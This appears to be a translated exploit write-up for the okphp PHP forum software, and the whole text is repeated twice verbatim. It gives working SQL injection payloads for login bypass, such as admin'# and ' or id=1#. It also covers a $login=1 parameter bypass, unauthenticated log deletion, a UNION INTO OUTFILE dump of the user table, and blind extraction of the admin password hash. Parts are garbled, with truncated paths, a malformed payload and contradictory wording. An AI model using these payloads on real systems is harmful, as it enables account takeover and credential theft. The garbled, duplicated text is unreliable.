Code:
$conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname);
$password = md5($password);
$q = "select id,group_id from $user_table where username=’$username’ and password=’$password’";
$res = sql_query($q,$conn);
$row = sql_fetch_row($res);
$q = "select id,group_id from $user_table where username=’$username’ and password=’$password’”
$username and $password are not filtered, so it is easy to bypass.
For statement modification methods such as select * from $user_table where username=’$username’ and password=’$password’ are:
Construct 1 (using logical operations): $username=’ or ’a’=’a $password=’ or ’a’=’a
Equivalent to SQL statement:
select * from $user_table where username= or ’a’=’a’ and password= or ’a’=’a’
Construct 2 (using the comment statement # in mysql, /* Comment out $password): $username=admin’# (or admin’/*)
Right now:
select * from $user_table where username=’admin’#’ and password=’$password’"
Equivalent to:
select * from $user_table where username=’admin’
$password in the $q statement in admin/ is encrypted md5 before querying, so it cannot be bypassed by the statement in construct 1. Here we use construct 2:
select id,group_id from $user_table where username=’admin’#’ and password=’$password’"
Equivalent to:
select id,group_id from $user_table where username=’admin’
As long as the user name is admin, it is true. If you don’t know the user name, you only know the corresponding id.
We can construct it like this: $username=’ or id=1#
Equivalent to:
select id,group_id from $user_table where username=’’ or id=1# and password=’$password’(The one after # is commented out)
Let's continue reading the code:
if ($row[0]) {
// If not admin or super moderator
if ($username != "admin" && !eregi("(^|&)3($|&)",$row[1])) {
$login = 0;
}
else {
$login = 1;
}
}
// Fail to login
---
if (!$login) {
write_log("Moderator login","0","password wrong");
echo "<script>alert(’login failed!’);(-1);</script>";
exit();
}
// Access !
-
else {
session_start();
Haha~~ Finally, we can simply judge by a $login. We can bypass it by just submitting ie, directly submitting $login=1.
/Injection causes bypassing authentication vulnerability:
Code:
$md5password = md5($password);
$q = "select id,group_id,email from $user_table where username=’$username’ and password=’$md5password’";
$res = sql_query($q,$conn);
$row = sql_fetch_row($res);
$username is not filtered using the same 1 commented out and password=’$md5password’"; so it bypassed.
There is a vulnerability to delete logging at will. (ps: This seems to have nothing to do with php+mysql injection, just mention it casually)
The background of okphp seems to be very careless, and all the files are not determined whether the administrator has logged in, so it can be accessed at will. The code we looked at:
$arr = array("del_log","log_id","del_id");
get_r($arr);
//
if ($del_log) {
Omitted...
if ($log_id) {
foreach ($log_id as $val) {
$q = "delete from $log_table where id=’$val’";
$res = sql_query($q,$conn);
if ($res) {
$i++;
}
}
}
elseif ($del_id) {
$q = "delete from $log_table where id=’$del_id’";
$res = sql_query($q,$conn);
}
$tpl->setVariable("message","$i log deleted ok!");
$tpl->setVariable("action","?action=list_log");
}
The code simply uses get_r($arr); to judge the submitted parameters. We only need to submit the corresponding $del_log, $log_id, and $del_id. The deletion is successful.
4. Multiple files do not filter the variables, resulting in SQL injection vulnerability.
The authors of okphp seem to like filtering :). Basically all variables in SQL statements. I won't list the specific files. Please read the code yourself. I will use orumslist_threads.php as an example to briefly talk about it.
Look at the code of list_threads.php:
$q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id=’$forum_id’";
$res = sql_query($q,$conn);
$row = sql_fetch_row($res);
The variable $forum_id is not filtered because mysql does not support subqueries. We can use union constructor statements to perform joint queries (requiring MySQL version is above 4.00) to implement cross-library operations. We construct them as follows:
Construct 1: Use Select * FROM table INTO OUTFILE ’/path/’ (requires mysql to have file permissions, please note that the path should be absolute in the win system, such as: c://path// ). Enter the query content, and then we can access the query results through http://ip/path/. We can construct $forum_id like this:
$forum_id=’ union select * from user_table into outfile ’/path/’
the following:
$q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id=’$forum_id’ union select * from user_table into outfile ’/path/’";
The above method is quite demanding, and you must get the web path (usually, you can get the error by submitting the wrong variable to cause mysql to report an error), and the magic_gpc=on option of php makes it impossible for single quotes to appear in the injection. If magic_gpc=on we can also bypass:
Construct 2: Just like asp cross-library query, use union select to construct statements directly to make the return result different to guess. This method can bypass single quotes (magic_gpc=on) and continue injection, but this kind of injection in PHP is relatively difficult and depends on the specific code. For specific statement construction, please refer to Pinkeyes’ article “Php Injection Example”. Next, I will combine okphp with an example of injection using "return results different": (see vulnerability 5).
/ and users/ can be guessed through SQL statement construction to get the specified user password hash: (In fact, this is the same as vulnerabilities 1 and 2, and is taken out separately here, mainly to explain the method of statement construction.)
The problem code is the same as vulnerability 1.
Statement construction (ps: Because the statement itself is an operation of the user library, there is no need to use union):
$username=admin’ AND LENGTH(password)=6#
The sql statement becomes:
$q = "select id,group_id from $user_table where username=’admin’ AND LENGTH(password)=6#’ and password=’$password’"
Equivalent to:
$q = "select id,group_id from $user_table where username=’admin’ AND LENGTH(password)=6’"
If LENGTH(password)=6 is valid, it will return normally. If it is not valid, mysql will report an error.
Haha, so we can guess the user admin password hash. For example, $username=admin’ ord(substring(password,1,1))=57#
You can guess the ascii code value of the first digit of the user's password..........
$conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname);
$password = md5($password);
$q = "select id,group_id from $user_table where username=’$username’ and password=’$password’";
$res = sql_query($q,$conn);
$row = sql_fetch_row($res);
$q = "select id,group_id from $user_table where username=’$username’ and password=’$password’”
$username and $password are not filtered, so it is easy to bypass.
For statement modification methods such as select * from $user_table where username=’$username’ and password=’$password’ are:
Construct 1 (using logical operations): $username=’ or ’a’=’a $password=’ or ’a’=’a
Equivalent to SQL statement:
select * from $user_table where username= or ’a’=’a’ and password= or ’a’=’a’
Construct 2 (using the comment statement # in mysql, /* Comment out $password): $username=admin’# (or admin’/*)
Right now:
select * from $user_table where username=’admin’#’ and password=’$password’"
Equivalent to:
select * from $user_table where username=’admin’
$password in the $q statement in admin/ is encrypted md5 before querying, so it cannot be bypassed by the statement in construct 1. Here we use construct 2:
select id,group_id from $user_table where username=’admin’#’ and password=’$password’"
Equivalent to:
select id,group_id from $user_table where username=’admin’
As long as the user name is admin, it is true. If you don’t know the user name, you only know the corresponding id.
We can construct it like this: $username=’ or id=1#
Equivalent to:
select id,group_id from $user_table where username=’’ or id=1# and password=’$password’(The one after # is commented out)
Let's continue reading the code:
if ($row[0]) {
// If not admin or super moderator
if ($username != "admin" && !eregi("(^|&)3($|&)",$row[1])) {
$login = 0;
}
else {
$login = 1;
}
}
// Fail to login
---
if (!$login) {
write_log("Moderator login","0","password wrong");
echo "<script>alert(’login failed!’);(-1);</script>";
exit();
}
// Access !
-
else {
session_start();
Haha~~ Finally, we can simply judge by a $login. We can bypass it by just submitting ie, directly submitting $login=1.
/Injection causes bypassing authentication vulnerability:
Code:
$md5password = md5($password);
$q = "select id,group_id,email from $user_table where username=’$username’ and password=’$md5password’";
$res = sql_query($q,$conn);
$row = sql_fetch_row($res);
$username is not filtered using the same 1 commented out and password=’$md5password’"; so it bypassed.
There is a vulnerability to delete logging at will. (ps: This seems to have nothing to do with php+mysql injection, just mention it casually)
The background of okphp seems to be very careless, and all the files are not determined whether the administrator has logged in, so it can be accessed at will. The code we looked at:
$arr = array("del_log","log_id","del_id");
get_r($arr);
//
if ($del_log) {
Omitted...
if ($log_id) {
foreach ($log_id as $val) {
$q = "delete from $log_table where id=’$val’";
$res = sql_query($q,$conn);
if ($res) {
$i++;
}
}
}
elseif ($del_id) {
$q = "delete from $log_table where id=’$del_id’";
$res = sql_query($q,$conn);
}
$tpl->setVariable("message","$i log deleted ok!");
$tpl->setVariable("action","?action=list_log");
}
The code simply uses get_r($arr); to judge the submitted parameters. We only need to submit the corresponding $del_log, $log_id, and $del_id. The deletion is successful.
4. Multiple files do not filter the variables, resulting in SQL injection vulnerability.
The authors of okphp seem to like filtering :). Basically all variables in SQL statements. I won't list the specific files. Please read the code yourself. I will use orumslist_threads.php as an example to briefly talk about it.
Look at the code of list_threads.php:
$q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id=’$forum_id’";
$res = sql_query($q,$conn);
$row = sql_fetch_row($res);
The variable $forum_id is not filtered because mysql does not support subqueries. We can use union constructor statements to perform joint queries (requiring MySQL version is above 4.00) to implement cross-library operations. We construct them as follows:
Construct 1: Use Select * FROM table INTO OUTFILE ’/path/’ (requires mysql to have file permissions, please note that the path should be absolute in the win system, such as: c://path// ). Enter the query content, and then we can access the query results through http://ip/path/. We can construct $forum_id like this:
$forum_id=’ union select * from user_table into outfile ’/path/’
the following:
$q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id=’$forum_id’ union select * from user_table into outfile ’/path/’";
The above method is quite demanding, and you must get the web path (usually, you can get the error by submitting the wrong variable to cause mysql to report an error), and the magic_gpc=on option of php makes it impossible for single quotes to appear in the injection. If magic_gpc=on we can also bypass:
Construct 2: Just like asp cross-library query, use union select to construct statements directly to make the return result different to guess. This method can bypass single quotes (magic_gpc=on) and continue injection, but this kind of injection in PHP is relatively difficult and depends on the specific code. For specific statement construction, please refer to Pinkeyes’ article “Php Injection Example”. Next, I will combine okphp with an example of injection using "return results different": (see vulnerability 5).
/ and users/ can be guessed through SQL statement construction to get the specified user password hash: (In fact, this is the same as vulnerabilities 1 and 2, and is taken out separately here, mainly to explain the method of statement construction.)
The problem code is the same as vulnerability 1.
Statement construction (ps: Because the statement itself is an operation of the user library, there is no need to use union):
$username=admin’ AND LENGTH(password)=6#
The sql statement becomes:
$q = "select id,group_id from $user_table where username=’admin’ AND LENGTH(password)=6#’ and password=’$password’"
Equivalent to:
$q = "select id,group_id from $user_table where username=’admin’ AND LENGTH(password)=6’"
If LENGTH(password)=6 is valid, it will return normally. If it is not valid, mysql will report an error.
Haha, so we can guess the user admin password hash. For example, $username=admin’ ord(substring(password,1,1))=57#
You can guess the ascii code value of the first digit of the user's password..........